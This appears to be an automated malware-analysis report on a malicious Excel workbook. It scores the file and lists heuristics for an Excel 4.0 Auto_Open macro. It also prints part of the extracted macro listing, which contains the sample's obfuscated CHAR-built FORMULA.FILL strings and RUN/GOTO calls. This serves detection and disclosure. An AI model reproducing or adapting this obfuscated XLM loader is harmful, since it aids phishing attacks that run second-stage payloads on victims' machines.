MALICIOUS
140
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The critical heuristics indicate the presence of Excel 4.0 macros with an Auto_Open entry, which is a known technique for executing arbitrary commands. The `RUN` and `risky-formula` values suggest the macro is designed to execute external code. This is commonly used to download and execute a second-stage payload, making it a likely component of a phishing attack.
Heuristics 3
-
Excel 4.0 Auto_Open defined name critical OLE_XLM_AUTOOPEN_DEFINEDNAMEoletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
-
XLM Auto_Open with dangerous formula APIs critical OLE_XLM_DANGEROUS_FNExcel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and dangerous XLM formula APIs that can invoke programs, write files, or transfer control without VBA.
-
Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPENWorkbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
xlm_macros.txt |
xlm-macro | oletools.olevba.extract_all_macros (XLM macro listing) | 125387 bytes |
SHA-256: b980e821a2a267bc9f6c44c628b4bee7e63aa0f3199bb43f2575bec65215fdd8 |
|||
Preview scriptFirst 1,000 lines of the extracted script
' 0085 14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible - Sheet ' 0085 14 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible - Sheet ' 0018 28 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open hidden len=7 ptgRef3d Sheet!V2004 ' 002a 2 PRINTHEADERS : Print Row/Column Labels ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 002a 2 PRINTHEADERS : Print Row/Column Labels ' Sheet,Reference,Formula,Value ' Sheet,FS7,"",0.21487603305785124563 ' Sheet,D59,"",-2.18901098901098878358 ' Sheet,DW74,"",400.60031249999997271516 ' Sheet,DD85,"",-115.70007812500000454747 ' Sheet,JK196,"",17.50000000000000000000 ' Sheet,IJ249,"",-9.34117647058823585837 ' Sheet,FE264,"",-34.79999999999999715783 ' Sheet,CY365,"",-142.10007812500001023182 ' Sheet,DQ485,"",1.88679245283018870438 ' Sheet,HR556,"",-0.13363636363636363646 ' Sheet,JA577,"SET.VALUE(DB28357,GET.CELL(24,HW55793)-171)","" ' Sheet,JA578,GOTO(IT43155),"" ' Sheet,DY644,"",-1.34927536231884048767 ' Sheet,EP654,"",0.53000030517578122780 ' Sheet,FD679,"",0.95833333333333337034 ' Sheet,T768,"",-425.12500000000000000000 ' Sheet,EP788,"",-44.80003906249999801048 ' Sheet,DY808,"",0.43442622950819670402 ' Sheet,JI936,"",2.47826086956521729476 ' Sheet,GA957,"",231.20015624999999204192 ' Sheet,EV971,"FORMULA.FILL(CHAR(IT56772-M6376)&CHAR(H51424*JJ44645)&CHAR(C430-IE65096)&CHAR(C430+HH26932)&CHAR(IM15047*GE44478)&CHAR(JQ5952*BD56859)&CHAR(IT56772-FG2054)&CHAR(BO41251+CY37308)&CHAR(GY47999+BV27707)&CHAR(IT56772+HC48413)&CHAR(GY47999*IU54790)&CHAR(H51424*HC47453)&CHAR(CT15537*EL27826)&CHAR(HC7870-HV33521)&CHAR(JQ5952+CP47968)&CHAR(IT56772/IX63149)&CHAR(CT15537*EX12676)&CHAR(H51424*FB8745)&CHAR(JQ5952/FE42166)&CHAR(BO41251*CN17164)&CHAR(BO41251/CM49465)&CHAR(JQ5952/FQ27154)&CHAR(GY47999/JJ32861)&CHAR(CT15537+EI14641)&CHAR(HC7870/FC49997)&CHAR(BO41251+IF42962)&CHAR(H51424/EN27975)&CHAR(C430/FJ33965)&CHAR(C430-GX55364)&CHAR(GZ63655/U56739),GC28295)","" ' Sheet,EV972,RUN(D22060),"" ' Sheet,IM1000,"",-2.32749999999999968026 ' Sheet,HW1084,"",84.00000000000000000000 ' Sheet,HD1097,"",22.79999999999999715783 ' Sheet,DU1139,"",-89.20007812500000454747 ' Sheet,FB1161,"",231.20015624999999204192 ' Sheet,IG1173,"",351.60031249999997271516 ' Sheet,FJ1183,"",-4.61764705882352899380 ' Sheet,FA1189,"",408.00000000000000000000 ' Sheet,Q1193,"",408.60031249999997271516 ' Sheet,HP1225,"",76.20003906249999658939 ' Sheet,GK1400,"",-2.27073170731707296710 ' Sheet,IY1426,"",43.50000000000000000000 ' Sheet,HV1474,"",1.35542168674698793041 ' Sheet,GU1488,"",0.40769230769230768718 ' Sheet,CM1620,"",64.50000000000000000000 ' Sheet,HN1635,"",-1.21546961325966851319 ' Sheet,EF1652,"",0.43442622950819670402 ' Sheet,GK1659,"",184.10015624999999772626 ' Sheet,EL1689,"",-2.27073170731707296710 ' Sheet,EN1737,"",3.50000000000000000000 ' Sheet,FH1783,"",62.80003906249999801048 ' Sheet,EU1788,"",-0.22590361445783133099 ' Sheet,FH1829,"",-272.00000000000000000000 ' Sheet,IB1856,"",-81.20003906249999658939 ' Sheet,Q1861,RUN(DV22613),"" ' Sheet,BG1925,"",20.80001953125000113687 ' Sheet,FO1960,"",0.18892508143322475633 ' Sheet,V2004,"SET.VALUE(H51424,26/8*GET.CELL(19,EW40615))","" ' Sheet,V2005,GOTO(HM32648),"" ' Sheet,ER2005,"",-180.00000000000000000000 ' Sheet,CS2007,"",-256.00000000000000000000 ' Sheet,FG2054,"",-78.50000000000000000000 ' Sheet,BM2087,"",-186.00000000000000000000 ' Sheet,CA2120,GOTO(JH9925),"" ' Sheet,CT2166,"",-1.12168674698795167721 ' Sheet,EW2196,"",-3.78947368421052610543 ' Sheet,DT2257,"",-438.60031249999997271516 ' Sheet,BQ2293,"",64.50000000000000000000 ' Sheet,BH2349,"",-53.50000000000000000000 ' Sheet,BW2351,"",0.73913043478260864738 ' Sheet,CL2357,"",-6.73469387755102033566 ' Sheet,DD2369,"",358.00000000000000000000 ' Sheet,JI2369,"",-616.60031249999997271516 ' Sheet,EM2411,"",1.00970873786407766559 ' Sheet,HL2430,"",-97.50000000000000000000 ' Sheet,HR2438,"",-212.00000000000000000000 ' Sheet,CS2494,"",-0.32011232011232010342 ' Sheet,T2513,"",41.00000000 ... (truncated) |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.